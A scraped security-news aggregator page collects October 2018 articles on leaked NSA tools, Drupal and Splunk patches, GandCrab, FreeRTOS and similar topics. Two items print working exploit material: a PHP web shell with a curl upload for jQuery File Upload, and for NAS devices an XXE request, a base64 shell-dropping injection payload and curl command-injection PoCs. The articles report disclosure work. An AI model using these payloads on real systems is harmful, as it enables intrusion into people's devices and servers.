Reading - Úvod  Odborné èlánky (42)  Bleskovky (0)  Témata (6)  List  EN  CZ  Blogy  ÈlánkyCZ   


 


22.8.2018

Novinka

v.02.08

4.11.2018 20:00

Update

Update10

Update 22.10.2018 09:26:11

21.10.2018 21:20

Aktualizace

0000010

RansomFree - Cybereason RansomFree is a powerful free software that offers strong ransomware protection and prevention capabilities, to protect your Windows.

Please do not block your ad, it is an important part of the site's revenue. 


DarkPulsar and other NSA hacking tools used in hacking operations in the wild
22.10.2018 securityaffairs

Attackers are targeting high-value servers using a three of hacking tools from NSA arsenal, including DarkPulsar, that were leaked by the Shadow Brokers hacker group.
The hackers used the powerful cyber weapons to compromise systems used in aerospace, nuclear energy, R&D, and other industries.

According to experts from Kaspersky Lab, threat actors leverage NSA tools DarkPulsar, DanderSpritz and Fuzzbunch to infect Windows Server 2003 and 2008 systems in 50 organizations in Russia, Iran, and Egypt.

The infected vulnerable servers are used in some 50 organizations within industries including aerospace and nuclear energy, particularly those with large IT and R&D departments.

“DanderSpritz consists entirely of plugins to gather intelligence, use exploits and examine already controlled machines. It is written in Java and provides a graphical windows interface similar to botnets administrative panels as well as a Metasploit-like console interface. It also includes its own backdoors and plugins for not-FuzzBunch-controlled victims.” Kaspersky Lab experts Andrey Dolgushev, Dmitry Tarakanov, and Vasily Berdnikov wrote.

“Fuzzbunch on the other hand provides a framework for different utilities to interact and work together. It contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc.”

DarkPulsar is a backdoor that could be used by attackers in conjunction with the Fuzzbunch exploit kit to gain remote access to the targeted server.

Once the backdoor is established the attackers could use the plugins of DanderSpritz to monitor and exfiltrate data from the compromised machines.

DarkPulsar ShadowBrokers

Each hacking tool supports a set of plugins designed for different tasks, the FuzzBunch plugins are used for reconnaissance and hacking the target system, DanderSpritz plugins are used for the management of already infected victims.

The discovery of the last wave of attacks is very important, it demonstrates that threat actors could chain nation-state hacking tools and exploit to create a powerful attack package. It shows how hackers combined the tool to carry out high sophisticated hacking operations.

“The discovery of the DarkPulsar backdoor helped in understanding its role as a bridge between the two leaked frameworks, and how they are part of the same attacking platform designed for long-term compromise, based on DarkPulsar’s advanced abilities for persistence and stealthiness,” Kaspersky Lab said.

“The implementation of these capabilities, such as encapsulating its traffic into legitimate protocols and bypassing entering credentials to pass authentication, are highly professional.”

The expert from Kaspersky also provided technical details and IoCs for the attacks leveraging the NSA tools.

It is important to remind that security patches are available for the vulnerabilities targeted by the leaked NSA exploits.

“The FuzzBunch and DanderSpritz frameworks are designed to be flexible and to extend functionality and compatibility with other tools,” concludes the experts.

“Each of them consists of a set of plugins designed for different tasks: while FuzzBunch plugins are responsible for reconnaissance and attacking a victim, plugins in the DanderSpritz framework are developed for managing already infected victims.”


Drupal dev team fixed Remote Code Execution flaws in the popular CMS
22.10.2018 securityaffairs

The Drupal development team has patched several vulnerabilities in version 7 and 8 of the popular CMS, including RCE flaws.
The development team of the Drupal content management system addressed several vulnerabilities in version 7 and 8, including some flaws that could be exploited for remote code execution.

Drupal team fixed a critical vulnerability that resides in the Contextual Links module, that fails to properly validate requested contextual links. The flaw could be exploited by an attacker with an account with the “access contextual links” permission for a remote code execution,

“The Contextual Links module doesn’t sufficiently validate the requested contextual links.” reads the security advisory.
“This vulnerability is mitigated by the fact that an attacker must have a role with the permission “access contextual links”.”

Another critical vulnerability fixed by the development team is an injection issue that resides in the DefaultMailSystem::mail() function. The root cause of the bug is the lack of sanitization of some variables for shell arguments when sending emails.

“When sending email some variables were not being sanitized for shell arguments, which could lead to remote code execution.” continues the advisory.

The remaining vulnerabilities addressed in the CMS have been assigned a “moderately critical” rating, they include a couple of open redirect bugs and an access bypass issue related to content moderation.

The vulnerabilities have been addressed with the release of Drupal 7.60, 8.6.2 and 8.5.8.

Drupal team urges users to install security updates as soon as possible, there is the concrete risk that threat actors in the wild will start to exploit flaw in massive hacking campaigns.


Thousands of applications affected by a zero-day issue in jQuery File Upload plugin
22.10.2018 securityaffairs

A security researcher discovered a zero-day vulnerability, tracked as CVE-2018-9206, that affects older versions of the jQuery File Upload plugin since 2010.
Attackers can exploit the vulnerability to carry out several malicious activities, including defacement, exfiltration, and malware infection.

The flaw was reported by the Akamai researcher Larry Cashdollar, he explained that many other packages that include the vulnerable code may be affected.

“This package has been included in various other packages and this code included in the projects web accessible path. It’s actively being exploited in the wild,” the researcher told the plugin author.

The jQuery File Upload is a jQuery widget “with multiple file selection, drag&drop support, progress bars, validation and preview images, audio and video.”

The plugin is widely adopted by numerous server-side platforms that support standard HTML form file uploads: PHP, Python, Ruby on Rails, Java, Node.js, Go, and others.

Cashdollar discovered two PHP files named upload.php and UploadHandler.php in the package’s source, which contained the file upload code.

The files were uploaded to the files/ directory in the root path of the webserver, so the expert wrote a command line test with curl and a simple PHP shell to confirm that it was possible to upload a web shell and run commands on the server.

$ curl -F “files=@shell.php” http://example.com/jQuery-File-Upload-9.22.0/server/php/index.php

Where shell.php is:

<?php $cmd=$_GET[‘cmd’]; system($cmd);?>

“A browser connection to the test web server with cmd=id returned the user id of the web server’s running process. I suspected this vulnerability hadn’t gone unnoticed and a quick Google search confirmed that other projects that used this code or possibly code derived from it were vulnerable. There are a few Youtube videos demonstrating the attack for similar software packages.” wrote the expert.

Evert project that leverages the plugin is potentially affected, the researcher pointed out that there are a few Youtube PoC videos demonstrating the exploitation of the attack for similar software packages.

Cashdollar also published a proof-of-concept (PoC) code.

The root cause of the problem is that Apache disabled support for .htaccess in version 2.3.9 to improve performance (the server doesn’t have to check for this file every time it accesses a director) and to prevent users from overriding security features that were configured on the server.

The side effect is that the technical choice left some developers and their projects open to attacks.

In order to address these changes and correct the file upload vulnerability in CVE-2018-9206 in Blueimp, the developer only allows file uploads to be of a content-type image.

“The internet relies on many security controls every day in order to keep our systems, data, and transactions safe and secure. If one of these controls suddenly doesn’t exist it may put security at risk unknowingly to the users and software developers relying on them.” concludes the expert.

“For software developers reviewing changes to the systems and libraries you rely on during the development of your project is a great idea as well. In the article above a security control was removed by Apache it not only removed a security control for Blueimp’s Jquery file upload software project but most of all of the forked code branches off of it. The vulnerability impacted many projects that depend on it from stand-alone web applications to WordPress plugins and other CMSs.”


Syrian victims of the GandCrab ransomware can decrypt their files for free
22.10.2018 securityaffairs

The developers of the GandCrab ransomware have released the decryption keys for all Syrian victims in an underground cybercrime forum.
The authors of the infamous GandCrab ransomware have released the decryption keys for all Syrian victims in an underground cybercrime forum.

gandcrab ransomware post underground
Gandcrab developers’ post – Source Bleeping Computer

The crooks decided to release the decryption keys after a Syrian Twitter user published a harrowing message asking for help after photos of his deceased children were encrypted by the ransomware.

جميل سليمان
@kvbNDtxL0kmIqRU
· Oct 16, 2018
@coveware Hello, my name is Jameel, I am a Syrian father who lost both his sons to the cruel war the country is going through
All I have left of my children is the photos and videos I took of them before they were mercilessly killed. And now GandCrab V5.0.3 has locked all of them

جميل سليمان
@kvbNDtxL0kmIqRU
They want 600 dollars to give me back my children, that's what they've done, they've taken my boys away from me for a some filthy money. How can I pay them 600 dollars if I barely have enough money to put food on the table for me and my wife?

7:55 AM - Oct 16, 2018
9
See جميل سليمان's other Tweets
Twitter Ads info and privacy
The GandCrab developers explained that it was not their intention to infect Syrian users, their message on the hacking forum includes a link to a zip file containing the decryption keys for Syrian victims.

“This zip file contains the readme.txt in Russian language and SY_keys.txt files. The readme.txt file contains information on how the key file is organized and information on why the keys were released.” states Bleeping Computer.

“The most important thing is not to indicate that he will help everyone. It will help only a citizen of Syria. Because of their political situation, economic and relations with the CIS countries. We regret that we did not initially add this country to the exceptions. But at least that way we can help them now.” reads the message from the author of the ransomware.

The SY_keys.txt file includes a list of 978 decryption keys for Syrian victims whose systems have been infected with GandCrab version 1.0 through 5.0.

Syrian victims that are not included in the file could receive the decryption keys by providing the GandCrab developers a picture of themselves, their passport, and their payment page. Providing crooks pictures of their passport is very risky, this kind of documents could be resold by the crooks or used by them for identity thefts.

Experts believe that security firms will develop a decryption tool based on the released encryption keys.


WizCase Report: Vulnerabilities found in WD My Book, NetGear Stora, SeaGate Home, Medion LifeCloud NAS
22.10.2018 securityaffairs

Security researchers from WizCase have discovered several vulnerabilities in WD My Book, NetGear Stora, SeaGate Home, Medion LifeCloud NAS.
NAS devices have become the storage device of choice for many small and medium businesses (SMB). They are inexpensive, easy to operate, and you can add additional storage if you’re running low on space. But is it secure enough to protect your companies data? That was the question in our mind when we brought security researchers Paulos Yibelo and Daniel Eshetu to see if they could exploit any vulnerabilities in the leading NAS devices.

We focused on discovering only critical vulnerabilities that can be exploited remotely without any user interaction. Meaning, authentication bypasses weren’t enough. We wanted to execute commands on the devices remotely with the highest privileges. We were successful, in all the devices.

Summary of Our Findings
We used four popular NAS devices for this project

WD My Book,
NetGear Stora
SeaGate Home
Medion LifeCloud NAS
We successfully gained root remote command execution in the devices, and therefore the network they are on, simply by knowing their IP addresses.

All four NAS devices tested suffer from a zero-day unauthenticated root remote command execution (preauth RCE) vulnerabilities.
The vulnerabilities allow hackers, governments, or anyone with malicious intention to read files, add/remove users, add/modify existing data, or execute commands with highest privileges on all of the devices.
It is our belief that there are many other NAS devices that suffer from similar vulnerabilities as there seems to be a missing pattern of expected from NAS devices.
Both the vulnerabilities (dubbed CVE-2018-18472 and CVE-2018-18471) remain unpatched at the time of this publication.
There are nearly 2 million affected devices online
CVE-2018-18472 – XXE and Unauthenticated Remote Command Execution in Axentra Hipserv NAS firmware.
Axentra Hipserv is a NAS OS that runs on multiple devices and provides cloud-based login and file storage and management functionalities for different devices. It’s used in different devices from different vendors, the affected devices sharing the firmware are:

Netgear Stora
Seagate GoFlex Home
Medion LifeCloud (maybe more).
The company provides a firmware with a web interface that mainly uses PHP as a serverside language. The web interface has a REST API endpoint and a typical web management interface with a file manager support.

Firmware Analysis.

After extracting the firmware and decoding the files, the php files were located in /var/www/html/ with the webroot in /var/www/html/html. The main handler for the web interface is homebase.php and RESTAPIController.php is the main handler for the rest API. All the php files were encrypted using IONCube which has a known public decoder and given the version used was an old one, decoding the files didn’t take long.

Part One: XXE

After decoding the files, most of the API endpoints and the web interface were not accessible without authentication. One of the few exceptions to this were a few endpoints in the REST API interface. One of those endpoints is located at /api/2.0/rest/aggregator/xml which loads xml data from POST data, although it uses DOMDocument for loading (parsing) the xml which should not be vulnerable to XXE attacks.

The version of libxml2 used as a backend in the firmware is an old one. This means that the external entity loading was not disabled by default. which opened the endpoint to exploitation. Through this it was possible to read files and perform SSRF attacks. An example request is given below

POST /api/2.0/rest/aggregator/xml HTTP/1.1
Host: 192.168.10.21
User-Agent: GoogleBot/2.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 246
Cookie: HOMEBASEID=c4be432f8add72db591aaa72c0fbbd34
Connection: close
Upgrade-Insecure-Requests: 1

<?xml version=”1.0″?>
<!DOCTYPE requests [
<!ELEMENT request (#PCDATA)>
<!ENTITY % dtd SYSTEM “http://192.168.10.20/XXE_CHECK”>
%dtd;
]>
<requests>
<request href=”/api/2.0/rest/3rdparty/facebook/” method=”GET”></request>
</requests>

The above request caused the xml parser to make a request to our server at 192.168.56.1 for the file XXE_CHECK. Although LFI was interesting to grab some sensitive files since XML can’t handle binary data it was not possible to dump the SQLite database to get usernames and passwords.

That meant we are able to read files and make SSRF requests in any of the below devices.

Netgear Stora
Seagate GoFlex Home
Medion LifeCloud
Part Two: RCE

Looking at how the web interface (REST API in particular) performed root actions was the next step. Since the web server runs as a non-root user and it had no sudo rights then it was found that the REST API makes calls to a local daemon named oe-spd, which runs on port 2000 bound to 127.0.0.1.

The daemon takes XML data, parses the request and carries out the action without any authentication, except making sure the request came from 127.0.0.1. What’s more, the daemon skips over junk data until it finds the string <?xml version=”1.0″?> as shown in the IDA snippet below.

strstr(*input_data, “<?xml version=\”1.0\”?>”);

This made things a lot easier since the request is going to be sent using the HTTP protocol, skipping over junk data (according to the daemon) was a real help. But, since we can’t directly put the URL in the xml file we make the xml parser send a request to a php script (or anything that does the redirection really) that redirects it to http://127.0.0.1:2000/a.php?d=*payload here*.

Since the daemon is choke full of command execution bugs, it was easy to craft a request that triggered one. Additionally, since the daemon runs with root privileges it’s possible to perform any action on the device. An example payload is given below.

* This payload uploads a simple php shell /var/www/html/html/u.php (<device-ip>/u.php?cmd=id).

<?xml version=”1.0″?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name=”disk”>a`echo PD9waHAKZWNobyAnPHByZT4nOwpzeXN0ZW0oJF9HRVRbJ2NtZCddKTsKZWNobyAnPC9wcmU+JzsKPz4K | base64 -d >/var/www/html/html/u.php`</parameter></proxy_request>

Putting it all together.
To chain the vulnerabilities seamlessly we need a server the device can make an outbound connection to and the following simple PHP script to redirect the parser to send the payload and handle a little multi-staging of payloads.

CVE-2018-18472 –WD MyBook Live Unauthenticated Remote Command Execution
WD MyBook Live and some models of WD MyCloud NAS contain a remotely exploitable vulnerability that lets anyone run commands on the device as root. The vulnerability exists in the language change and modifies functionality in the REST API, the following PoC demonstrates this flaw.

PoC:

curl –kX PUT -d ‘language=en_US`<linx Command Here>`’ https://<NAS_IP>/api/1.0/rest/language_configuration

Examples:

curl –kX PUT -d ‘language=en_US`id > /var/www/id.txt`’ https://<NAS_IP>/api/1.0/rest/language_configuration

The poc will create a id.txt file in the webroot containing the output of the ID command. The file can be removed using the following PoC

curl -kX PUT -d ‘language=en_US`rm -rf /var/www/id.txt`’ https://<NAS_IP>/api/1.0/rest/language_configuration

What does this mean to the affected NAS users?
If you are using one of the above devices and they are connected on the WAN, make sure to remove your device from the internet. (Make sure they are running only locally in safe network)
Make sure to contact the affected vendors and insist they release a patch as soon possible!
We will update this article as a patch becomes available.
We also recommend you use a VPN to protect your computers and mobile devices from hackers. ExpressVPN and NordVPN both use AES 256-bit encryption and will secure all your data. (This won’t protect from an NAS attack, but it will protect you from other cyber attacks)


Hackers breached into system that interacts with HealthCare.gov
22.10.2018 securityaffairs

Centers for Medicare and Medicaid Services announced hackers breached into a computer system that interacts with HealthCare.gov.
Hackers breached into a computer system that interacts with HealthCare.gov, according to Centers for Medicare and Medicaid Services, attackers accessed to the sensitive personal data of some 75,000 people.

After experts discovered the intrusion, the system was shut down and the IT staff is working to restore the operation.

“Officials said the hacked system was shut down and technicians are working to restore it before sign-up season starts Nov. 1 for health care coverage under the Affordable Care Act.” reported the Associated Press.

“The system that was hacked is used by insurance agents and brokers to directly enroll customers. All other sign-up systems are working.”

In the US, Barack Obama’s health care law ensured the private coverage for about 10 million people that in order to access the public service have to provide extensive personal information, including Social Security numbers, income, and citizenship or legal immigration status.

Starting November 1, people can log in to HealthCare.gov, fill out an application, and enroll in a 2019 Marketplace health plan.

A spokesman for the Centers for Medicare and Medicaid declared that “nothing happened” to the HealthCare.gov website that is used by the general public.

“This concerns the agent and broker portal, which is not accessible to the general public,” he said.

Law enforcement is investigating the incident and notified affected customers that will receive free credit protection.


Chinese Hackers Use 'Datper' Trojan in Recent Campaign
21.10.2018 securityweek
CyberSpy  Virus

A China-linked cyber espionage group known as Tick was observed using the Datper malware in a recent campaign, Cisco Talos security researchers reveal.

Also referred to as Redbaldknight and Bronze Butler, Tick has been launching various cyber-attacks against entities in South Korea and Japan over the past couple of years. The campaign Talos analyzed also used compromised websites located in the two countries as command and control (C&C) servers.

Although Tick has been using custom tools in each campaign, the researchers observed a series of recurring patterns in the use of infrastructure, such as overlaps in hijacked C&C domains or the use of the same IP.

Based on these infrastructure patterns, the experts discovered similarities between the Datper, xxmm backdoor, and Emdivi malware families that the threat actor has used in attacks.

Datper, the malware used in the campaign Talos analyzed, can execute shell commands on the victim machine, while also obtaining hostnames and drive information. The used infection vector, however, is unknown, Talos says.

The analyzed Datper variant used the compromised website of a legitimate Korean laundry service to host their C&C. Located at whitepia[.]co.kr, the site does not use SSL encryption or certificates, which rendered it vulnerable to attacks.

The security researchers observed other compromised websites as well being used as C&C servers as part of the attack. This led to the hypothesis that the malware could be delivered via web-based assaults, such as drive-by downloads or watering hole attacks.

Talos also discovered hosts that were being used as C&C servers although they were not connected to compromised websites. This would suggest that the hackers initially deployed the C&C infrastructure on legitimately obtained (and potentially purchased) hosts.

“The actor behind this campaign deployed and managed their C&X infrastructure mainly in South Korea and Japan. We confirmed that the actor periodically changed their C&C infrastructure and appears to have a history of identifying and penetrating vulnerable websites located in these countries,” Talos says.

Once on the infected machine, Datper would create a mutex object and retrieve several pieces of information from the victim machine, including system information and keyboard layout. Next, the malware attempts to issue an HTTP GET request to the C&C server (which was unavailable during investigation).

Some of the compromised websites were also used as C&C domains for the xxmm backdoor, also known as Murim or Wrim, which was previously associated with the threat actor, and which allows attackers to install additional malicious tools onto the infected machines. The two samples also use similar GET request URI paths.

A Datper variant compiled in March 2018 was observed using a legitimate website as C&C, resolving to the same IP used for the C&C infrastructure of the Emdivi malware family. This Trojan opens a backdoor on the compromised machines and was previously attributed to the threat actor behind the campaign "Blue termite."

“Talos’ investigation into attacks conducted by this actor indicates commonalities between the Datper, xxmm backdoor, and Emdivi malware families. Specifically, these similarities are in the C&C infrastructure of attacks utilizing these malware families. Some C&C domains used in these attacks resolve to hijacked, legitimate South Korean and Japanese hosts and may have been purchased by the attacker,” Talos concludes.


Flaws Open Telepresence Robots to Prying Eyes
21.10.2018 securityweek
Vulnerebility 

Vulnerabilities in telepresence robots could provide an attacker not only with command execution capabilities, but also with access to a live video stream from the device, Zingbox reports.

The healthcare IoT analytics platform provider has analyzed the VGo telepresence robot from Vecna. Nicknamed “Celia,” it has an XMPP chat client that supports voice and video communication over the VGoNet Cloud Network.

When a call is connected, the caller, whose face is displayed on the device’s screen, can control the robot using the client interface. In addition to voice calls and video streaming, the robot can speak text messages, move around at different speeds, take pictures, and recognize speech.VGo telepresence robots are affected by vulnerabilities

During its assessment of the device, Zingbox discovered five vulnerabilities that it reported to the manufacturer via ICS-CERT. These include issues usually found in IoT devices, such as insufficiently protected credentials and the transmission of sensitive information in cleartext.

One of the most important issues discovered in the device was the fact that firmware updates were being delivered over HTTP. Tracked as CVE-2018-8860, the vulnerability could allow an attacker sniffing the network to intercept the update.

VGo telepresence robots are affected by vulnerabilities

Next, the attacker could use various tools to peek inside the intercepted firmware and find weaknesses they could target to compromise the robot. The Zingbox security researchers did find such an issue in the form of a CGI script that was not supposed to be included on production, being a development tool.

“It could run limited commands on the robot, probably for diagnostics, such as those to view running processes, view logs, reboot the robot, and see network connections,” the researchers explain in a report (PDF).

Tracked as CVE-2018-8866, the next vulnerability consists of most of the GET parameters of the CGI being vulnerable to command injection, due to the lack of input validation. This provided the researchers with arbitrary command execution capabilities.

Because the CGI script runs with root privileges, the researchers could also gain unauthorized root access to the robot. Leveraging such privileges, an attacker could then abuse the robot to target other systems located in the same network segment.

Code execution could also be achieved with physical access to the USB slot located in the back of the robot. An attacker with a USB stick containing a file with the name startup.script inside a config folder in the root partition could gain code execution by simply plugging in the device into the port and rebooting the robot.

Once inside the robot, the researchers also discovered that Wi-Fi and robot XMPP credentials were stored in plain text (CVE-2018-8858). Armed with the Wi-Fi credentials, an attacker could then start attacking other assets on the network.

The security researchers also discovered chat information in log files, thus being able to read and steal text messages sent between the conversation partners. With the pictures taken by the robot being temporarily stored locally in the robot’s file system, an attacker who already has access to the robot can also retrieve those when they are created.

Moreover, an attacker “can capture live video streaming remotely and start watching the victims live,” the researchers warn.

The vendor has released an update that patches the vulnerabilities. Automatic updates are enabled by default.


Splunk Patches Several Flaws in Enterprise, Light Products
21.10.2018 securityweek 
Vulnerebility

Splunk recently patched several vulnerabilities in its Enterprise and Light products, including flaws that have been rated “high severity.”

Splunk Enterprise allows organizations to search, analyze and visualize data collected from websites, apps, sensors and other devices. Splunk Light is a solution that automates log searching and analysis, along with server and network monitoring, in small IT networks.

The most serious of the vulnerabilities affecting these products – with a CVSS score of 8.1 (high severity) – is CVE-2018-7427, a cross-site scripting (XSS) issue in the Splunk Web interface.

Another serious flaw allows an attacker to cause a denial-of-service (DoS) condition by sending a specially crafted HTTP request to Splunkd, the system process that handles indexing, searching and forwarding. This bug is tracked as CVE-2018-7429.

CVE-2018-7432 is a similar DoS flaw that can be exploited using malicious HTTP requests sent to Splunkd, but the vendor has only assigned it a “medium severity” rating.

The last vulnerability, tracked as CVE-2018-7431 and also rated “medium severity,” has been described as a path traversal issue that allows an authenticated attacker to download arbitrary files from the Splunk Django app.

Two of the vulnerabilities affect Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.7, 6.3.x before 6.3.10, 6.2.x before 6.2.14, 6.1.x before 6.1.13, 6.0.x before 6.0.14, and Splunk Light before 6.6.0. CVE-2018-7432 affects the same versions, except for 6.1.x and 6.0.x. CVE-2018-7429 impacts Enterprise 6.4.x before 6.4.8, 6.3.x before 6.3.11, 6.2.x before 6.2.14, and Light before 6.5.0.

Splunk says it has found no evidence to suggest that these vulnerabilities have been exploited for malicious purposes.

“To mitigate these issues, Splunk recommends upgrading to the latest release and applying as many of the Hardening Standards from the Securing Splunk documentation as are relevant to your environment. Splunk Enterprise and Splunk Light releases are cumulative, meaning that future releases will contain fixes to these vulnerabilities, new features and other bug fixes,” Splunk said in an advisory.


Remote Code Execution Flaws Patched in Drupal
21.10.2018 securityweek
Vulnerebility
Developers of the Drupal content management system (CMS) have patched several vulnerabilities in the 7 and 8 branches, including serious flaws that can be exploited for remote code execution.

One of the security holes, rated “critical,” affects the Contextual Links module, which fails to properly validate requested contextual links. The vulnerability can allow remote code execution, but the attacker requires an account with the “access contextual links” permission for exploitation.

Another “critical” flaw is an injection issue in the DefaultMailSystem::mail() function. The problem is caused by the lack of sanitization of some variables for shell arguments when sending emails.

It’s worth noting that in Drupal’s case “critical” is the second highest security risk level, after “highly critical.” “Moderately critical” follows “critical” on the criticality scale.

The other three vulnerabilities addressed in the CMS this week have been assigned a “moderately critical” rating. This includes an access bypass issue related to content moderation, and two open redirect bugs.

One of the open redirect issues was publicly documented before the patches were released. Drupal developers also warned that the changes implemented in order to fix the access bypass weakness can have implications for backwards compatibility.

The vulnerabilities have been patched with the release of Drupal 7.60, 8.6.2 and 8.5.8.

It’s important that users install security updates as soon as possible. Drupal vulnerabilities have often been exploited by malicious hackers in the past years.

The recently disclosed flaws dubbed Drupalgeddon2 and Drupalgeddon3 have been exploited to deliver cryprocurrency miners, RATs, tech support scams and other threats. In recent attacks, threat actors exploited Drupalgeddon2 to install a backdoor on compromised servers.


Mozilla Brings Encrypted SNI to Firefox Nightly
21.10.2018 securityweek
Safety

Mozilla says Firefox Nightly now supports encrypting the Transport Layer Security (TLS) Server Name Indication (SNI) extension, several weeks after Cloudflare announced it turned on Encrypted SNI (ESNI) across all of its network.

Introduced in 2003 to address the issue of accessing encrypted websites hosted at the same IP, the SNI extension was found to leak the identity of the sites that the user visits, which creates privacy issues. The problem is that, during the initial TLS handshake, the ClientHello message is sent unencrypted.

ESNI, an extension to TLS version 1.3 and above, attempts to mitigate that by replacing the SNI extension in ClientHello with an encrypted variant.

Now, Firefox Nightly users can take advantage of this added protection by enabling the encryption of SNI in the browser. ESNI will automatically work with any site that supports it, which currently only means sites hosted by Cloudflare.

Over 80% of the web traffic today is encrypted with HTTPS, meaning that the content of the messages exchanged between a server and a user’s browser are kept private, but attackers can still learn which sites the user is accessing.

As Mozilla’s Eric Rescorla explains, browsing history information leaks to the network in four ways, namely through the TLS certificate message, DNS name resolution, the server IP address, and the SNI extension.

TLS 1.3 now encrypts the server certificate by default and DNS traffic can be protected by using DNS over HTTPS. The IP address remains an issue, somewhat mitigated by the fact that multiple sites often use the same address (which is the reason SNI was needed in the first place).

ESNI, Rescorla says, posed challenges because initial designs affected performance, and TLS 1.3 was eventually published without it. As it turns out, the issue can be mounted via mass-conversion to encrypted SNI.

“Big Content Distribution Networks (CDNs) host a lot of sites all on the same machines. If they’re willing to convert all their customers to ESNI at once, then suddenly ESNI no longer reveals a useful signal because the attacker can see what CDN you are going to anyway,” he explains.

With the added support for ESNI, Firefox becomes the first browser to adopt the technology. Users looking to take advantage of it should grab the latest Firefox Nightly build, make sure they have DNS over HTTPS enabled, and set the “network.security.esni.enabled” preference in about:config to “true”.

“This should automatically enable ESNI for any site that supports it. Right now, that’s just Cloudflare, which has enabled ESNI for all its customers, but we’re hoping that other providers will follow them,” Rescorla notes.


EU Leaders Vow Tough Action on Cyber Attacks
21.10.2018 securityweek 
BigBrothers

EU leaders on Thursday condemned the attempted hack on the global chemical weapons watchdog and vowed to step up the bloc's efforts to tackle cyber attacks.

With concerns growing about the malign cyber activities of several countries around the world, notably Russia, the bloc's leaders called for work to begin to set up sanctions to punish hackers.

The decision at an EU summit in Brussels comes after eight countries led by Britain pushed for urgent moves to hit hackers, warning that a lack of action was giving the impression that cyber attacks would go unpunished.

"Work on the capacity to respond to and deter cyber attacks through EU restrictive measures should be taken forward," the 28 leaders said in their summit communique.

The statement condemned the bid, revealed this month, by Russia's GRU military intelligence agency to hack the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague.

"Such threats and attacks strengthen our common resolve to further enhance the EU's internal security and our ability and capabilities to detect, prevent, disrupt and respond to hostile activities of foreign intelligence networks," the summit statement said.

A proposal backed by Britain, Lithuania, Estonia, Latvia, Denmark, Finland, Romania and the Netherlands earlier this week called for a sanctions regime to be set up to punish cyber attackers.

If approved, the EU sanctions regime would freeze assets held in the bloc by targeted individuals and ban them from travelling to the 28 member states.

But efforts to crack down on cyber attackers may face resistance from some EU members who want to improve relations with Russia, such as the new Italian government.


FreeRTOS Vulnerabilities Expose Many Systems to Attacks
21.10.2018 securityweek
Vulnerebility

Vulnerabilities discovered in the FreeRTOS operating system can expose a wide range of systems to attacks, including smart home devices and critical infrastructure, researchers warn.

FreeRTOS is an open source operating system designed specifically for microcontrollers. The OS has many use cases, including industrial applications (sensors, actuators, pumps), B2B solutions (security equipment, door locks), and consumer products (home appliances, wearable technology). Amazon, which took over the FreeRTOS project in 2017, has added cloud connectivity capabilities.freeRTOS vulnerabilities found

The commercial version of the operating system is called OpenRTOS and it’s maintained by WITTENSTEIN high integrity systems (WHIS), which also develops the safety-focused version SafeRTOS.

Researchers from Zimperium’s zLabs have analyzed FreeRTOS’s TCP/IP stack and AWS secure connectivity modules, and discovered more than a dozen vulnerabilities that also impact OpenRTOS and SafeRTOS.

Both Amazon and WHIS have developed patches for the flaws discovered by zLabs. Amazon addressed the issues with the release of FreeRTOS 1.3.2.

Since it’s an open source project, the mobile cybersecurity firm has decided not to disclose any vulnerability details for another 30 days to allow vendors to deploy the patches.

The company did, however, share some limited information about each of the flaws it discovered. The list includes four remote code execution, one denial-of-service (DoS), and seven information leakage issues.

“These vulnerabilities allow an attacker to crash the device, leak information from the device’s memory, and remotely execute code on it, thus completely compromising it,” zLabs said in a blog post.

Since FreeRTOS is used by a wide range of systems, the vulnerabilities found by Zimperium researchers can be highly useful to malicious actors, including cybercriminals trying to build botnets powered by home device, and sophisticated threat actors looking to target critical infrastructure.


Server With National Guard Personnel Data Target of Attack
21.10.2018 securityweek 
Attack

The Indiana National Guard says a state, non-military computer server containing personal information on civilian and military Guard personnel was the target of a recent ransomware attack.

The Guard said Thursday it is notifying the affected personnel that they should be alert for suspicious activity or fraudulent accounts being opened in their name.

It says the type of ransomware attack targets the server by denying access to the rightful owners but usually does not compromise the contents of the server. It says it has no reason to believe it was a targeted attack against the Indiana National Guard.

The Guard says it's taking steps to prevent future such attacks.


DarkPulsar
20.10.2018 Kaspersky
APT

In March 2017, the ShadowBrokers published a chunk of stolen data that included two frameworks: DanderSpritz and FuzzBunch.

DanderSpritz consists entirely of plugins to gather intelligence, use exploits and examine already controlled machines. It is written in Java and provides a graphical windows interface similar to botnets administrative panels as well as a Metasploit-like console interface. It also includes its own backdoors and plugins for not-FuzzBunch-controlled victims.

DanderSprit interface

Fuzzbunch on the other hand provides a framework for different utilities to interact and work together. It contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. There are three files in the plugin set from the FuzzBunch framework:

%pluginName%-version.fb
This is the utility file of the framework. It duplicates the header from XML and includes the plugin’s ID.

%pluginName%-version.exe
This executable file is launched when FuZZbuNch receives the command to do so.

%pluginName%-version.xml
This configuration file describes the plugin’s input and output parameters – the parameter name, its type and description of what it’s responsible for; all of these can be shown in FuzzBunch as a prompt. This file also contributes a lot to the framework’s usability, as it supports the specification of default parameters.

One of the most interesting Fuzzbunch’s categories is called ImplantConfig and includes plugins designed to control the infected machines via an implant at the post-exploitation stage. DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ‘sipauth32.tsp’ that provides remote control, belonging to this category.

It supports the following commands:

Burn
RawShellcode
EDFStagedUpload
DisableSecurity
EnableSecurity
UpgradeImplant
PingPong
Burn, RawShellcode, UpgradeImplant, and PingPong remove the implant, run arbitrary code, upgrade the implant and check if the backdoor is installed on a remote machine, respectively. The purpose of the other commands is not that obvious and, to make it worse, the leaked framework contained only the administrative module to work with DarkPulsar’s backdoor, but not the backdoor itself.

While analyzing the administrative module, we noticed several constants that are used to encrypt the traffic between the C&C and the implant:

We thought that probably these constants should also appear in the backdoor, so we created a detection for them. Several months later we found our mysterious DarkPulsar backdoor. We later were able to find both 32- and 64-bit versions.

We found around 50 victims located in Russia, Iran and Egypt, typically infecting Windows 2003/2008 Server. Targets were related to nuclear energy, telecommunications, IT, aerospace and R&D.

DarkPulsar technical highlights
The DarkPulsar implant is a dynamic library whose payload is implemented in exported functions. These functions can be grouped as follows:

Two nameless functions used to install the backdoor in the system.
Functions with names related to TSPI (Telephony Service Provider Interface) operations that ensure the backdoor is in the autorun list and launched automatically.
